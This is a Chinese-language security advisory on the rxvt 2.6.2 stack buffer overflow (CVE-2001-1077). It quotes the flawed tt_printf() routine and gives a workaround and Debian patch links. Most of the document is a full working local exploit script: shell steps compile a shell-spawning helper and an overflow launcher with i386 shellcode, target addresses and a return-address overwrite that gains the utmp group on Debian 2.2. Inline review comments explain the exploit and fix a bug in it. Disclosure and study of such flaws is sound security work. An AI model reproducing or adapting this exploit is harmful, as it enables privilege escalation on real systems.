Rxvt 本地缓冲区溢出漏洞

发布日期:2001-06-15
更新日期:2001-06-25

受影响系统:

rxvt 2.6.2
   - Debian Linux 2.2 sparc
   - Debian Linux 2.2 powerpc
   - Debian Linux 2.2 arm
   - Debian Linux 2.2 alpha
   - Debian Linux 2.2 68k
   - Debian Linux 2.2
描述:

BUGTRAQ  ID: 2878
CVE(CAN) ID: CAN-2001-1077(候选编号,后转为正式编号 CVE-2001-1077)

Rxvt 是一个彩色VT102终端仿真程序,可以作为xterm的替代软件。

rxvt存在一个栈缓冲区溢出漏洞。如果给它的某些命令行选项("-T"或者"-name")提供超长
的参数,rxvt随后通过 tt_printf() 把该字符串回写到终端时(例如响应终端发来的标题查询
序列,见下文测试代码),就会把一个固定长度的栈缓冲区写穿。rxvt在某些系统下被设置了
setgid utmp属性,本地攻击者可能利用这个漏洞来获取utmp组权限。

有问题的代码在tt_printf()函数:

/*
 * Vulnerable rxvt 2.6.2 routine as quoted by the advisory.
 *
 * Formats its arguments into a fixed 256-byte stack buffer with
 * vsprintf(), which takes no length and stops only at the end of the
 * formatted output, then hands the result to tt_write().  Any caller that
 * feeds it attacker-controlled text longer than the buffer (the advisory
 * names the "-T" and "-name" command-line strings) overruns buf and the
 * saved frame pointer / return address that the accompanying exploit
 * overwrites.
 *
 * A bounded version would call vsnprintf(buf, sizeof buf, fmt, arg_ptr)
 * and truncate or drop the output when the return value is >= sizeof buf.
 */
void
tt_printf(const char *fmt,...)
{
    int i;                        /* unused in this excerpt */
    va_list         arg_ptr;
    unsigned char   buf[256];     /* fixed size, never passed to the formatter */

    va_start(arg_ptr, fmt);
    vsprintf(buf, fmt, arg_ptr);  /* unbounded write: the overflow */
    va_end(arg_ptr);
    tt_write(buf, strlen(buf));
}

<*来源:Samuel "Zorgon" Dralet (samuel.dralet@mastersecurity.fr) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Samuel "Zorgon" Dralet (samuel.dralet@mastersecurity.fr) 提供了
如下测试代码:

#!/bin/sh

#
# MasterSecuritY <www.mastersecurity.fr>
#
# xrxvt.sh - Local exploit for xrxvt 2.6.2
# Copyright (C) 2001  Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
# Copyright (C) 2001  Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

# Interactive target selection.  "echo -e" / "echo -n" are bash extensions;
# under a strictly POSIX /bin/sh the "-e" would be printed literally.
echo "rxvt-2.6.2 exploit for Linux Debian 2.2"
echo "Which target :"
echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2"
echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2"
echo
echo -n "target : "

# Not validated here; /tmp/xrxvt converts it with atoi() and range-checks it.
read TARGET

# First helper, compiled to /tmp/xx: the program the shellcode finally
# execve()s.  The heredoc delimiter is unquoted, so the C text is subject
# to shell parameter expansion (harmless as written: it contains no '$').
cat > /tmp/xx.c <<EOF
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/*
 * Helper exec'd by the shellcode.
 *
 * Re-attaches stdin and stdout to the tty that stderr still refers to,
 * then runs /bin/sh.  The open() results are compared with
 * STDIN_FILENO / STDOUT_FILENO, i.e. the code relies on fds 0 and 1 being
 * closed when it starts (presumably they are not usable in the context the
 * shellcode runs in); if either open() lands on a different fd it gives up.
 * execve() is called with a NULL envp, so the shell starts with an empty
 * environment.  Returns -1 on any failure; never returns on success.
 */
int main()
{
    char * p_ttyname;
    char * argv[] = { "/bin/sh", NULL };

    p_ttyname = ttyname( STDERR_FILENO );
    if ( p_ttyname == NULL ) {
        return( -1 );
    }
    /* lowest free descriptor must be 0 here ... */
    if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) {
        return( -1 );
    }
    /* ... and 1 here */
    if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) {
        return( -1 );
    }

    execve( argv[0], argv, NULL );
    return( -1 );   /* only reached if execve() failed */
}
EOF
# gcc's exit status is not checked: if the build fails, /tmp/xx is missing
# and the shellcode's execve() of it fails later with no message here.
gcc -o /tmp/xx /tmp/xx.c
rm -f /tmp/xx.c

# Second helper, the program that launches rxvt with the overflowing
# argument (unquoted heredoc delimiter again, see above).
cat > /tmp/xrxvt.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <X11/X.h>
#include <X11/Xlib.h>

#define BUF 256    /* size of tt_printf()'s stack buffer */
#define EBP 4      /* saved frame pointer sitting above that buffer */
#define EIP 4      /* saved return address above the frame pointer */
#define ESC 3      /* alignment: presumably the bytes the victim's format
                      string emits ahead of the title, so ESC fewer title
                      bytes are needed to fill BUF */

#define GID "\x2b"  /* 0x2b = 43: the utmp group id on the Debian target */
#define DISPLAY ":0"
#define STACK ( 0xc0000000 - 4 )   /* top of the i386 user stack (no ASLR);
                                      everything below is i386-only */

Display *d;   /* only used to probe that DISPLAY is reachable */

/*
 * i386 Linux payload, passed as the sole environment string (see main()).
 * NOTE(review): description decoded from the bytes, not run on a target.
 * It contains no NUL byte, which a strcpy-style copy of it requires.
 */
char shellcode[] =
/* setregid( -1, GID ); */          /* eax=0x47 (setregid), ebx=-1, ecx=GID, int 0x80 */
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* setregid( GID, GID ); */         /* same call with ebx=ecx=GID */
"\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* Aleph One ;) */                  /* execve("/tmp/xx", {"/tmp/xx", NULL}, NULL), then exit(0);
                                       it patches the bytes right after the path string in place,
                                       i.e. past the end of this array wherever it is running from */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";

/*
 * One exploitable build of rxvt 2.6.2.  target[] initialises these
 * positionally, so the field order is part of the contract.
 */
struct os
{
    int id;              /* not read by the visible code; mirrors the array index */
    char *desc;          /* human-readable name; NULL marks the end of target[] */
    char *path;          /* setgid binary that main() execve()s */
    unsigned long plt;   /* PLT stub the overwritten return address jumps to */
    unsigned long got;   /* GOT address; got+4 is used as copy target and return target */
};

/*
 * Per-build addresses, valid only for these two specific i386 Debian 2.2
 * binaries (the Debian package installs the program as rxvt-xterm).
 * The last element is a NULL-desc sentinel, but
 * sizeof(target) / sizeof(struct os) still counts it, so usage() lists
 * index 2 and main()'s range check accepts it, after which
 * strlen(target[2].path) dereferences NULL.
 */
struct os target[]=
{
    { 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm",
      0x0804add0, 0x0805c964 },
    { 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt",
      0x0804a690, 0x08059e1c },
    { 2, NULL, 0, 0 }   /* sentinel */
};

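/*
 * Print the usage banner and the selectable targets to stderr, then exit
 * with status -1.
 *
 * cmd: argv[0] of the running program, echoed in the usage line.
 *
 * Fixes over the original: the loop variable was never initialised
 * ("for( i < 0; ..." compared an uninitialised i instead of assigning it,
 * undefined behaviour), and the NULL-desc sentinel that terminates
 * target[] was printed as a target through "%s".  The loop now starts at
 * 0 and stops at the sentinel or the end of the array, whichever is first.
 */
void usage ( char *cmd )
{
    int i;
    fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n");
    fprintf(stderr, "usage: %s <target>\n",cmd);
    fprintf(stderr, "with target:\n\n");
    for ( i = 0;
          i < (int)(sizeof(target) / sizeof(struct os)) && target[i].desc != NULL;
          i++ )
    fprintf(stderr, "%d. %s\n", i, target[i].desc);

    exit( -1 );
}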

/*
 * Build the overflowing "-T" argument and execve() the setgid rxvt binary
 * with it.
 *
 * argv[1] selects an entry of target[] (converted with atoi(), so any
 * non-numeric text selects target 0).  The range check compares against
 * the element count, which includes the NULL sentinel at the end of
 * target[]: passing its index makes strlen(target[t].path) dereference
 * NULL.  malloc()'s result is not checked either.
 *
 * Payload layout written into buffer[], in order:
 *   BUF - ESC + EBP bytes of 'A'  fill tt_printf()'s buf and the saved ebp
 *   plt              replaces the saved return address: control goes to a
 *                    PLT stub of the victim (presumably a strcpy-style
 *                    routine; the next three words match such a call)
 *   got + 4          fake return address for that routine
 *   got + 4          its first argument (destination)
 *   shellcode addr   its second argument (source): the environment string,
 *                    at a fixed offset below STACK because the new process
 *                    gets exactly one env string and the kernel has no ASLR
 * If that reading is right, the shellcode is copied into the writable GOT
 * and executed from there when the routine returns.
 *
 * The XOpenDisplay() call only checks that DISPLAY ":0" is reachable; the
 * connection is never used or closed and its fd is inherited across the
 * execve().  This program does not trigger the overflow by itself: rxvt
 * has to echo the title back through tt_printf(), which the driver script
 * provokes by having the user send ESC [ 21 t in the new window.
 */
int main(int argc, char *argv[])
{
    char buffer[ BUF - ESC + EBP + EIP + 12 + 1];   /* 274 bytes: payload + NUL */
    char * exec_argv[] = { NULL, "-T", buffer, NULL };
    char * envp[] = { shellcode, NULL };            /* single env string, see above */
    int i, t;
    char *path;

    if ( argc != 2 )
    usage(argv[0]);

    t = atoi(argv[1]);
    /* NOTE(review): also accepts the index of the NULL sentinel in target[] */
    if( t < 0 || t >= sizeof(target) / sizeof(struct os) )
    usage( argv[0] );

    path = (char *)malloc(strlen(target[t].path)+1);    /* malloc() unchecked */
    strcpy(path,target[t].path);
         
    if ( (d = XOpenDisplay(DISPLAY)) == NULL ){
    fprintf(stderr, "Unable to open display: %s\n", DISPLAY);
    exit(10);
    }

    for ( i = 0; i < BUF - ESC + EBP; i++ ) {
    buffer[ i ] = 'A';
    }

    /* Unaligned word stores through a size_t pointer; tolerated on i386,
       the only architecture the payload addresses are meaningful for. */
    *( (size_t *) &(buffer[i]) ) = target[t].plt;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    /* assumes the env string sits directly below the exec path, which
       sits directly below STACK */
    *( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode);
    i += sizeof(size_t);
  
    buffer[i] = '\0';

    exec_argv[0] = path;
    execve( exec_argv[0], exec_argv, envp );
    return( -1 );   /* only reached if execve() failed */
}
EOF
# Exit status not checked, as for the first helper.
gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11
rm -f /tmp/xrxvt.c

# The overflow only fires once rxvt echoes its overlong title back through
# tt_printf(); the sequence the user is told to type (CSI 21 t, presumably
# the xterm "report window title" request) asks for exactly that.
echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..."
echo "And see ..."
# TARGET is unquoted: an empty reply passes no argument and xrxvt prints usage.
/tmp/xrxvt $TARGET



建议:

临时解决方法:

我们建议您暂时去掉rxvt的setuid/setgid属性(下面以测试代码中Debian软件包的安装路径为例,
请先用 ls -l 确认本机rxvt的实际路径及是否带有 setgid utmp 属性):
# chmod a-s /usr/X11R6/bin/rxvt-xterm
去掉该属性后rxvt通常将不能再更新utmp登录记录,这只是临时措施,请尽快安装下面的厂商补丁。

厂商补丁:

Debian Linux (http://www.debian.org/security/)为此发布了一份安全公告 :
DSA-062-1 rxvt: buffer overflow
http://www.debian.org/security/2001/dsa-062

补丁下载 -
________________________________________________________________________
Debian GNU/Linux 2.2 (potato)

Source:
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.dsc
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2.orig.tar.gz

Alpha:
http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb

ARM:
http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb

Intel IA-32:
http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb

Motorola 680x0:
http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb

PowerPC:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb

Sun Sparc:
http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb

________________________________________________________________________


本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载